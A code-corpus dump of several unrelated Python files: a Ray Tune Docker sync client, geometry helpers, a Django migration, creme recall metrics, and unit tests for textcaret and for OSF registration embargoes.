"""DockerSyncClient to be used by DockerSyncer.
This client takes care of executing the synchronization
commands for Docker nodes. In its ``sync_down`` and
``sync_up`` commands, it expects tuples for the source
and target, respectively, for compatibility with docker.
Args:
should_bootstrap: Whether to bootstrap the autoscaler
cofiguration. This may be useful when you are
running into authentication problems; i.e.:
https://github.com/ray-project/ray/issues/17756.
"""
def __init__(self, should_bootstrap: bool = True):
self._command_runners = {}
self._cluster_config = None
if os.environ.get("TUNE_SYNC_DISABLE_BOOTSTRAP") == "1":
should_bootstrap = False
logger.debug("Skipping bootstrap for docker sync client.")
self._should_bootstrap = should_bootstrap
def configure(self, cluster_config_file: str):
self._cluster_config_file = cluster_config_file
def sync_up(self,
source: str,
target: Tuple[str, str],
exclude: Optional[List] = None) -> bool:
"""Here target is a tuple (target_node, target_dir)"""
target_node, target_dir = target
# Add trailing slashes for rsync
source = os.path.join(source, "")
target_dir = os.path.join(target_dir, "")
import click
try:
rsync(
cluster_config=self._cluster_config_file,
source=source,
target=target_dir,
down=False,
ip_address=target_node,
should_bootstrap=self._should_bootstrap,
use_internal_ip=True)
except click.ClickException:
if log_once("docker_rsync_up_fail"):
logger.warning(
"Rsync-up failed. Consider using a durable trainable "
"or setting the `TUNE_SYNC_DISABLE_BOOTSTRAP=1` env var.")
raise
return True
def sync_down(self,
source: Tuple[str, str],
target: str,
exclude: Optional[List] = None) -> bool:
"""Here source is a tuple (source_node, source_dir)"""
source_node, source_dir = source
# Add trailing slashes for rsync
source_dir = os.path.join(source_dir, "")
target = os.path.join(target, "")
import click
try:
rsync(
cluster_config=self._cluster_config_file,
source=source_dir,
target=target,
down=True,
ip_address=source_node,
should_bootstrap=self._should_bootstrap,
use_internal_ip=True)
except click.ClickException:
if log_once("docker_rsync_down_fail"):
logger.warning(
"Rsync-down failed. Consider using a durable trainable "
"or setting the `TUNE_SYNC_DISABLE_BOOTSTRAP=1` env var.")
raise
return True
def delete(self, target: str) -> bool:
raise NotImplementedError
| 2.234375 | 2 |
model/common.py | hdiddle13/Sat2Graph | 72 | 12759575 | <filename>model/common.py
import math
import numpy as np
def neighbors_dist(neighbors, k1, k2):
a = k1[0] - k2[0]
b = k1[1] - k2[1]
return math.sqrt(a*a+b*b)
def neighbors_norm(neighbors, k1, k2):
l = neighbors_dist(neighbors, k1, k2)
a = k1[0] - k2[0]
b = k1[1] - k2[1]
return a/l, b/l
def neighbors_cos(neighbors, k1, k2, k3):
vec1 = neighbors_norm(neighbors, k2, k1)
vec2 = neighbors_norm(neighbors, k3, k1)
return vec1[0] * vec2[0] + vec1[1] * vec2[1]
def ccw(A,B,C):
return (C[1]-A[1]) * (B[0]-A[0]) > (B[1]-A[1]) * (C[0]-A[0])
# Return true if line segments AB and CD intersect
def intersect(A,B,C,D):
return ccw(A,C,D) != ccw(B,C,D) and ccw(A,B,C) != ccw(A,B,D)
def distance(A,B):
a = A[0]-B[0]
b = A[1]-B[1]
return np.sqrt(a*a + b*b)
def intersectPoint(A,B,C,D):
l = distance(A,B)
min_d = 100000000000
min_p = A
for i in range(int(l)):
a = float(i)/l
x = A[0] * (1-a) + B[0]*a
y = A[1] * (1-a) + B[1]*a
d = distance((x,y),C)
d += distance((x,y),D)
if d < min_d:
min_d = d
min_p = (x,y)
return min_p
def graph_coverage(nei, p, r = 4):
visited = {}
depth = {}
queue = [p]
depth[p] = 0
visited[p] = 1
while len(queue)>0:
cp = queue.pop()
if depth[cp] > r:
continue
for n in nei[cp]:
if n not in visited:
depth[n] = depth[cp] + 1
queue.append(n)
visited[n] = 1
return visited.keys()
| 2.8125 | 3 |
backend/src/accounts/migrations/0003_auto_20180623_0213.py | rcmiskin10/mob_files | 0 | 12759576 | # Generated by Django 2.0.4 on 2018-06-23 02:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0002_adminprofile_businessprofile_eventprofile_participantprofile'),
]
operations = [
migrations.AlterField(
model_name='user',
name='user_type',
field=models.PositiveSmallIntegerField(blank=True, choices=[(1, 'paticipant'), (2, 'business'), (3, 'event'), (4, 'admin')], null=True),
),
]
| 1.664063 | 2 |
test/scripts/starterr.py | codders/mitmproxy | 3 | 12759577 | <gh_stars>1-10
def start(ctx, argv):
raise ValueError
| 1.140625 | 1 |
creme/metrics/recall.py | igorol/creme | 0 | 12759578 | <filename>creme/metrics/recall.py
import collections
import itertools
import statistics
from .. import stats
from . import base
from . import confusion
from . import precision
__all__ = [
'MacroRecall',
'MicroRecall',
'Recall',
'RollingMacroRecall',
'RollingMicroRecall',
'RollingRecall'
]
class BaseRecall:
@property
def bigger_is_better(self):
return True
@property
def requires_labels(self):
return True
class Recall(stats.Mean, BaseRecall, base.BinaryMetric):
"""Binary recall score.
Example:
::
>>> from creme import metrics
>>> y_true = [True, False, True, True, True]
>>> y_pred = [True, True, False, True, True]
>>> metric = metrics.Recall()
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
Recall: 1.
Recall: 1.
Recall: 0.5
Recall: 0.666667
Recall: 0.75
"""
def update(self, y_true, y_pred):
if y_true:
return super().update(y_true == y_pred)
return self
class MacroRecall(BaseRecall, base.MultiClassMetric):
"""Macro-average recall score.
Example:
::
>>> from creme import metrics
>>> y_true = [0, 1, 2, 2, 2]
>>> y_pred = [0, 0, 2, 2, 1]
>>> metric = metrics.MacroRecall()
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
MacroRecall: 1.
MacroRecall: 0.5
MacroRecall: 0.666667
MacroRecall: 0.666667
MacroRecall: 0.555556
"""
def __init__(self):
self.recalls = collections.defaultdict(Recall)
self.classes = set()
def update(self, y_true, y_pred):
self.recalls[y_true].update(True, y_true == y_pred)
self.classes.update({y_true, y_pred})
return self
def get(self):
return statistics.mean((
0 if c not in self.recalls else self.recalls[c].get()
for c in self.classes
))
class MicroRecall(precision.MicroPrecision):
"""Micro-average recall score.
The micro-average recall is exactly equivalent to the micro-average precision as well as the
micro-average F1 score.
Example:
::
>>> from creme import metrics
>>> y_true = [0, 1, 2, 2, 2]
>>> y_pred = [0, 0, 2, 2, 1]
>>> metric = metrics.MicroRecall()
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
MicroRecall: 1.
MicroRecall: 0.5
MicroRecall: 0.666667
MicroRecall: 0.75
MicroRecall: 0.6
References:
1. `Why are precision, recall and F1 score equal when using micro averaging in a multi-class problem? <https://simonhessner.de/why-are-precision-recall-and-f1-score-equal-when-using-micro-averaging-in-a-multi-class-problem/>`_
"""
class RollingRecall(BaseRecall, base.BinaryMetric):
"""Rolling binary recall score.
Parameters:
window_size (int): Size of the window of recent values to consider.
Example:
::
>>> from creme import metrics
>>> y_true = [True, False, True, True, True]
>>> y_pred = [True, True, False, True, True]
>>> metric = metrics.RollingRecall(window_size=3)
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
RollingRecall: 1.
RollingRecall: 1.
RollingRecall: 0.5
RollingRecall: 0.5
RollingRecall: 0.666667
"""
def __init__(self, window_size):
self.window_size = window_size
self.tp_ratio = stats.RollingMean(window_size=window_size)
self.fn_ratio = stats.RollingMean(window_size=window_size)
def update(self, y_true, y_pred):
self.tp_ratio.update(y_true and y_pred)
self.fn_ratio.update(y_true and not y_pred)
return self
def get(self):
tp = self.tp_ratio.get()
fn = self.fn_ratio.get()
try:
return tp / (tp + fn)
except ZeroDivisionError:
return 0.
class RollingMacroRecall(MacroRecall):
"""Rolling macro-average recall score.
Parameters:
window_size (int): Size of the window of recent values to consider.
Example:
::
>>> from creme import metrics
>>> y_true = [0, 1, 2, 2, 2]
>>> y_pred = [0, 0, 2, 2, 1]
>>> metric = metrics.RollingMacroRecall(window_size=3)
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
RollingMacroRecall: 1.
RollingMacroRecall: 0.5
RollingMacroRecall: 0.666667
RollingMacroRecall: 0.333333
RollingMacroRecall: 0.333333
"""
def __init__(self, window_size):
self.window_size = window_size
self.rcm = confusion.RollingConfusionMatrix(window_size=window_size)
def update(self, y_true, y_pred):
self.rcm.update(y_true, y_pred)
return self
def get(self):
# Use the rolling confusion matric to count the true positives and false negatives
classes = self.rcm.classes
tps = collections.defaultdict(int)
fns = collections.defaultdict(int)
for yt, yp in itertools.product(classes, repeat=2):
if yt == yp:
tps[yp] = self.rcm.counts.get(yt, {}).get(yp, 0)
else:
fns[yp] += self.rcm.counts.get(yp, {}).get(yt, 0)
def div_or_0(a, b):
try:
return a / b
except ZeroDivisionError:
return 0.
return statistics.mean((div_or_0(tps[c], tps[c] + fns[c]) for c in classes))
class RollingMicroRecall(precision.RollingMicroPrecision):
"""Rolling micro-average recall score.
The micro-average recall is exactly equivalent to the micro-average precision as well as the
micro-average F1 score.
Parameters:
window_size (int): Size of the window of recent values to consider.
Example:
::
>>> from creme import metrics
>>> y_true = [0, 1, 2, 2, 2]
>>> y_pred = [0, 0, 2, 2, 1]
>>> metric = metrics.RollingMicroRecall(window_size=3)
>>> for yt, yp in zip(y_true, y_pred):
... print(metric.update(yt, yp))
RollingMicroRecall: 1.
RollingMicroRecall: 0.5
RollingMicroRecall: 0.666667
RollingMicroRecall: 0.666667
RollingMicroRecall: 0.666667
References:
1. `Why are precision, recall and F1 score equal when using micro averaging in a multi-class problem? <https://simonhessner.de/why-are-precision-recall-and-f1-score-equal-when-using-micro-averaging-in-a-multi-class-problem/>`_
"""
| 2.34375 | 2 |
tests/test_textcaret.py | jcharistech/textcaret | 1 | 12759579 | <filename>tests/test_textcaret.py
from textcaret import __version__
from textcaret import TextCaret,TextSentiment
def test_version():
assert __version__ == '0.0.1'
def test_isTextCaret():
pass
def test_isTextSentiment():
pass
def test_TextCaret_sentiment_report():
s = "I love apples. John hates eating onions without using a mint afterwards"
docx = TextCaret(s)
results = docx.sentiment_report()
results_as_sentence = results['sentence']
results_as_sentiment = results['sentiment'].polarity
# {'sentence': 'I love apples. John hates eating onions without using a mint afterwards', 'sentiment': Sentiment(polarity=0.5, subjectivity=0.6)}
assert results_as_sentiment == 0.5
assert type(results_as_sentence) == str
def test_TextCaret_summary_report():
s = "I love apples. John hates eating onions without using a mint afterwards"
docx = TextCaret(s)
results = docx.summary_report()
assert type(results) == dict
def test_TextCaret_visual_report():
s = "I love apples. John hates eating onions without using a mint afterwards"
docx = TextCaret(s)
results = docx.visual_report()
assert type(results) != None
| 2.546875 | 3 |
extract_corpus.py | EuromovDHM-SemTaxM/kit-mld-ke | 0 | 12759580 | import sys
from argparse import ArgumentParser
if __name__ == "__main__":
argv = sys.argv[1:]
parser = ArgumentParser()
if len(argv) == 0:
parser.print_help()
parser.exit(1)
parser.add_argument("dataset_path", type=str,
help="Path to the directory containing the kit-mld dataset")
parser.add_argument("--gold_format", "-g", choices=["original", "seb", "csv", "answer"], type=str, nargs=1,
dest="gold_format",
help="Format of the gold annotations. original: path to the original dataset directory to use."
"seb: a file that contains the paths of the original dataset files included in a split. "
"csv: a file that contains the dataset as a dataframe", required=False, default=["csv"]) | 2.859375 | 3 |
tests/test_registration_embargoes.py | bdyetton/prettychart | 0 | 12759581 | """Tests related to embargoes of registrations"""
import datetime
import json
import mock
from nose.tools import * #noqa
from tests.base import fake, OsfTestCase
from tests.factories import (
AuthUserFactory, EmbargoFactory, NodeFactory, ProjectFactory,
RegistrationFactory, UserFactory, UnconfirmedUserFactory
)
from framework.exceptions import PermissionsError
from modularodm.exceptions import ValidationValueError
from website.exceptions import (
InvalidEmbargoDisapprovalToken, InvalidEmbargoApprovalToken, NodeStateError,
)
from website.models import Embargo, Node
from website.project.model import ensure_schemas
class RegistrationEmbargoModelsTestCase(OsfTestCase):
def setUp(self):
super(RegistrationEmbargoModelsTestCase, self).setUp()
self.user = UserFactory()
self.project = ProjectFactory(creator=self.user)
self.registration = RegistrationFactory(project=self.project)
self.embargo = EmbargoFactory(user=self.user)
self.valid_embargo_end_date = datetime.datetime.utcnow() + datetime.timedelta(days=3)
# Validator tests
def test_invalid_state_raises_ValidationValueError(self):
with assert_raises(ValidationValueError):
self.embargo.state = 'not a valid state'
self.embargo.save()
# Node#_initiate_embargo tests
def test__initiate_embargo_does_not_save_embargo(self):
initial_count = Embargo.find().count()
self.registration._initiate_embargo(
self.user,
self.valid_embargo_end_date,
for_existing_registration=True
)
self.assertEqual(Embargo.find().count(), initial_count)
def test__initiate_embargo_does_not_create_tokens_for_unregistered_admin(self):
unconfirmed_user = UnconfirmedUserFactory()
self.registration.contributors.append(unconfirmed_user)
self.registration.add_permission(unconfirmed_user, 'admin', save=True)
assert_true(self.registration.has_permission(unconfirmed_user, 'admin'))
embargo = self.registration._initiate_embargo(
self.user,
self.valid_embargo_end_date,
for_existing_registration=True
)
assert_true(self.user._id in embargo.approval_state)
assert_false(unconfirmed_user._id in embargo.approval_state)
def test__initiate_embargo_with_save_does_save_embargo(self):
initial_count = Embargo.find().count()
self.registration._initiate_embargo(
self.user,
self.valid_embargo_end_date,
for_existing_registration=True,
save=True
)
self.assertEqual(Embargo.find().count(), initial_count + 1)
# Backref tests
def test_embargo_initiator_has_backref(self):
self.registration.embargo_registration(
self.user,
self.valid_embargo_end_date
)
self.registration.save()
self.registration.reload()
assert_equal(len(self.user.embargo__embargoed), 1)
# Node#embargo_registration tests
def test_embargo_from_non_admin_raises_PermissionsError(self):
self.registration.remove_permission(self.user, 'admin')
self.registration.save()
self.registration.reload()
with assert_raises(PermissionsError):
self.registration.embargo_registration(self.user, self.valid_embargo_end_date)
def test_embargo_end_date_in_past_raises_ValidationValueError(self):
with assert_raises(ValidationValueError):
self.registration.embargo_registration(
self.user,
datetime.datetime(1999, 1, 1)
)
def test_embargo_end_date_today_raises_ValidationValueError(self):
with assert_raises(ValidationValueError):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow()
)
def test_embargo_end_date_in_far_future_raises_ValidationValueError(self):
with assert_raises(ValidationValueError):
self.registration.embargo_registration(
self.user,
datetime.datetime(2099, 1, 1)
)
def test_embargo_with_valid_end_date_starts_pending_embargo(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
def test_embargo_public_project_makes_private_pending_embargo(self):
self.registration.is_public = True
assert_true(self.registration.is_public)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
assert_false(self.registration.is_public)
def test_embargo_non_registration_raises_NodeStateError(self):
self.registration.is_registration = False
self.registration.save()
with assert_raises(NodeStateError):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
assert_false(self.registration.pending_embargo)
# Embargo#approve_embargo tests
def test_invalid_approval_token_raises_InvalidEmbargoApprovalToken(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
invalid_approval_token = 'not a real token'
with assert_raises(InvalidEmbargoApprovalToken):
self.registration.embargo.approve_embargo(self.user, invalid_approval_token)
assert_true(self.registration.pending_embargo)
assert_false(self.registration.embargo_end_date)
def test_non_admin_approval_token_raises_PermissionsError(self):
non_admin = UserFactory()
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
with assert_raises(PermissionsError):
self.registration.embargo.approve_embargo(non_admin, approval_token)
assert_true(self.registration.pending_embargo)
def test_one_approval_with_one_admin_embargoes(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
self.registration.embargo.approve_embargo(self.user, approval_token)
assert_true(self.registration.embargo_end_date)
assert_false(self.registration.pending_embargo)
def test_approval_adds_to_parent_projects_log(self):
initial_project_logs = len(self.registration.registered_from.logs)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
self.registration.embargo.approve_embargo(self.user, approval_token)
# Logs: Created, registered, embargo initiated, embargo approved
assert_equal(len(self.registration.registered_from.logs), initial_project_logs + 2)
def test_one_approval_with_two_admins_stays_pending(self):
admin2 = UserFactory()
self.registration.contributors.append(admin2)
self.registration.add_permission(admin2, 'admin', save=True)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
# First admin approves
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
self.registration.embargo.approve_embargo(self.user, approval_token)
assert_true(self.registration.pending_embargo)
num_of_approvals = sum([val['has_approved'] for val in self.registration.embargo.approval_state.values()])
assert_equal(num_of_approvals, 1)
# Second admin approves
approval_token = self.registration.embargo.approval_state[admin2._id]['approval_token']
self.registration.embargo.approve_embargo(admin2, approval_token)
assert_true(self.registration.embargo_end_date)
assert_false(self.registration.pending_embargo)
num_of_approvals = sum([val['has_approved'] for val in self.registration.embargo.approval_state.values()])
assert_equal(num_of_approvals, 2)
# Embargo#disapprove_embargo tests
def test_invalid_disapproval_token_raises_InvalidEmbargoDisapprovalToken(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
with assert_raises(InvalidEmbargoDisapprovalToken):
self.registration.embargo.disapprove_embargo(self.user, fake.sentence())
assert_true(self.registration.pending_embargo)
assert_false(self.registration.embargo_end_date)
def test_non_admin_disapproval_token_raises_PermissionsError(self):
non_admin = UserFactory()
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
with assert_raises(PermissionsError):
self.registration.embargo.disapprove_embargo(non_admin, disapproval_token)
assert_true(self.registration.pending_embargo)
def test_one_disapproval_cancels_embargo(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
assert_false(self.registration.pending_embargo)
assert_false(self.registration.embargo_end_date)
def test_disapproval_adds_to_parent_projects_log(self):
initial_project_logs = len(self.registration.registered_from.logs)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
registered_from = self.registration.registered_from
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
# Logs: Created, registered, embargo initiated, embargo cancelled
assert_equal(len(registered_from.logs), initial_project_logs + 2)
def test_cancelling_embargo_deletes_parent_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
assert_true(self.registration.is_deleted)
def test_cancelling_embargo_for_existing_registration_does_not_delete_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10),
for_existing_registration=True
)
self.registration.save()
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
assert_false(self.registration.is_deleted)
# Embargo property tests
def test_new_registration_is_pending_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_registration)
def test_existing_registration_is_not_pending_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10),
for_existing_registration=True
)
self.registration.save()
assert_false(self.registration.pending_registration)
class RegistrationWithChildNodesEmbargoModelTestCase(OsfTestCase):
def setUp(self):
super(RegistrationWithChildNodesEmbargoModelTestCase, self).setUp()
self.user = AuthUserFactory()
self.auth = self.user.auth
self.valid_embargo_end_date = datetime.datetime.utcnow() + datetime.timedelta(days=3)
self.project = ProjectFactory(title='Root', is_public=False, creator=self.user)
self.component = NodeFactory(
creator=self.user,
parent=self.project,
title='Component'
)
self.subproject = ProjectFactory(
creator=self.user,
parent=self.project,
title='Subproject'
)
self.subproject_component = NodeFactory(
creator=self.user,
parent=self.subproject,
title='Subcomponent'
)
self.registration = RegistrationFactory(project=self.project)
# Reload the registration; else tests won't catch failures to save
self.registration.reload()
def test_approval_embargoes_descendant_nodes(self):
# Initiate embargo for parent registration
self.registration.embargo_registration(
self.user,
self.valid_embargo_end_date
)
self.registration.save()
assert_true(self.registration.pending_embargo)
# Ensure descendant nodes are pending embargo
descendants = self.registration.get_descendants_recursive()
for node in descendants:
assert_true(node.pending_embargo)
# Approve parent registration's embargo
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
self.registration.embargo.approve_embargo(self.user, approval_token)
assert_true(self.registration.embargo.embargo_end_date)
# Ensure descendant nodes are in embargo
descendants = self.registration.get_descendants_recursive()
for node in descendants:
assert_true(node.embargo_end_date)
def test_disapproval_cancels_embargo_on_descendant_nodes(self):
# Initiate embargo on parent registration
self.registration.embargo_registration(
self.user,
self.valid_embargo_end_date
)
self.registration.save()
assert_true(self.registration.pending_embargo)
# Ensure descendant nodes are pending embargo
descendants = self.registration.get_descendants_recursive()
for node in descendants:
assert_true(node.pending_embargo)
# Disapprove parent registration's embargo
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
self.registration.embargo.disapprove_embargo(self.user, disapproval_token)
assert_false(self.registration.pending_embargo)
assert_false(self.registration.embargo_end_date)
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
# Ensure descendant nodes' embargoes are cancelled
descendants = self.registration.get_descendants_recursive()
for node in descendants:
assert_false(node.pending_embargo)
assert_false(node.embargo_end_date)
class RegistrationEmbargoApprovalDisapprovalViewsTestCase(OsfTestCase):
def setUp(self):
super(RegistrationEmbargoApprovalDisapprovalViewsTestCase, self).setUp()
self.user = AuthUserFactory()
self.registration = RegistrationFactory(creator=self.user)
# node_registration_embargo_approve tests
def test_GET_from_unauthorized_user_raises_HTTPForbidden(self):
unauthorized_user = AuthUserFactory()
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=fake.sentence()),
auth=unauthorized_user.auth,
expect_errors=True
)
assert_equal(res.status_code, 403)
def test_GET_approve_registration_without_embargo_raises_HTTPBad_Request(self):
assert_false(self.registration.pending_embargo)
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=fake.sentence()),
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
def test_GET_approve_with_invalid_token_returns_HTTPBad_Request(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=fake.sentence()),
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
def test_GET_approve_with_wrong_token_returns_HTTPBad_Request(self):
admin2 = UserFactory()
self.registration.contributors.append(admin2)
self.registration.add_permission(admin2, 'admin', save=True)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
wrong_approval_token = self.registration.embargo.approval_state[admin2._id]['approval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=wrong_approval_token),
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
def test_GET_approve_with_wrong_admins_token_returns_HTTPBad_Request(self):
admin2 = UserFactory()
self.registration.contributors.append(admin2)
self.registration.add_permission(admin2, 'admin', save=True)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
wrong_approval_token = self.registration.embargo.approval_state[admin2._id]['approval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=wrong_approval_token),
auth=self.user.auth,
expect_errors=True
)
assert_true(self.registration.pending_embargo)
assert_equal(res.status_code, 400)
def test_GET_approve_with_valid_token_returns_redirect(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
approval_token = self.registration.embargo.approval_state[self.user._id]['approval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_approve', token=approval_token),
auth=self.user.auth,
)
self.registration.embargo.reload()
assert_true(self.registration.embargo_end_date)
assert_false(self.registration.pending_embargo)
assert_equal(res.status_code, 302)
# node_registration_embargo_disapprove tests
def test_GET_from_unauthorized_user_returns_HTTPForbidden(self):
unauthorized_user = AuthUserFactory()
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=fake.sentence()),
auth=unauthorized_user.auth,
expect_errors=True
)
assert_equal(res.status_code, 403)
def test_GET_disapprove_registration_without_embargo_HTTPBad_Request(self):
assert_false(self.registration.pending_embargo)
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=fake.sentence()),
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
def test_GET_disapprove_with_invalid_token_returns_HTTPBad_Request(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=fake.sentence()),
auth=self.user.auth,
expect_errors=True
)
self.registration.embargo.reload()
assert_true(self.registration.pending_embargo)
assert_equal(res.status_code, 400)
def test_GET_disapprove_with_wrong_admins_token_returns_HTTPBad_Request(self):
admin2 = UserFactory()
self.registration.contributors.append(admin2)
self.registration.add_permission(admin2, 'admin', save=True)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
wrong_disapproval_token = self.registration.embargo.approval_state[admin2._id]['disapproval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=wrong_disapproval_token),
auth=self.user.auth,
expect_errors=True
)
assert_true(self.registration.pending_embargo)
assert_equal(res.status_code, 400)
def test_GET_disapprove_with_valid_token_returns_redirect_to_parent(self):
project = ProjectFactory(creator=self.user)
registration = RegistrationFactory(project=project)
registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
registration.save()
assert_true(registration.pending_embargo)
disapproval_token = registration.embargo.approval_state[self.user._id]['disapproval_token']
res = self.app.get(
registration.web_url_for('node_registration_embargo_disapprove', token=disapproval_token),
auth=self.user.auth,
)
registration.embargo.reload()
assert_equal(registration.embargo.state, Embargo.CANCELLED)
assert_false(registration.embargo_end_date)
assert_false(registration.pending_embargo)
assert_equal(res.status_code, 302)
assert_true(project._id in res.location)
def test_GET_disapprove_for_existing_registration_with_valid_token_returns_redirect_to_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10),
for_existing_registration=True
)
self.registration.save()
assert_true(self.registration.pending_embargo)
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=disapproval_token),
auth=self.user.auth,
)
self.registration.embargo.reload()
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
assert_false(self.registration.embargo_end_date)
assert_false(self.registration.pending_embargo)
assert_equal(res.status_code, 302)
assert_true(self.registration._id in res.location)
class RegistrationEmbargoViewsTestCase(OsfTestCase):
def setUp(self):
super(RegistrationEmbargoViewsTestCase, self).setUp()
ensure_schemas()
self.user = AuthUserFactory()
self.project = ProjectFactory(creator=self.user)
self.registration = RegistrationFactory(project=self.project, creator=self.user)
current_month = datetime.datetime.now().strftime("%B")
current_year = datetime.datetime.now().strftime("%Y")
self.valid_make_public_payload = json.dumps({
u'embargoEndDate': u'Fri, 01, {month} {year} 00:00:00 GMT'.format(
month=current_month,
year=current_year
),
u'registrationChoice': 'immediate',
u'summary': unicode(fake.sentence())
})
valid_date = datetime.datetime.now() + datetime.timedelta(days=180)
self.valid_embargo_payload = json.dumps({
u'embargoEndDate': unicode(valid_date.strftime('%a, %d, %B %Y %H:%M:%S')) + u' GMT',
u'registrationChoice': 'embargo',
u'summary': unicode(fake.sentence())
})
self.invalid_embargo_date_payload = json.dumps({
u'embargoEndDate': u"Thu, 01 {month} {year} 05:00:00 GMT".format(
month=current_month,
year=str(int(current_year)-1)
),
u'registrationChoice': 'embargo',
u'summary': unicode(fake.sentence())
})
@mock.patch('framework.tasks.handlers.enqueue_task')
def test_POST_register_make_public_immediately_creates_public_registration(self, mock_enqueue):
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.valid_make_public_payload,
content_type='application/json',
auth=self.user.auth
)
assert_equal(res.status_code, 201)
registration = Node.find().sort('-registered_date')[0]
assert_true(registration.is_registration)
assert_true(registration.is_public)
@mock.patch('framework.tasks.handlers.enqueue_task')
def test_POST_register_make_public_immediately_makes_children_public(self, mock_enqueue):
component = NodeFactory(
creator=self.user,
parent=self.project,
title='Component'
)
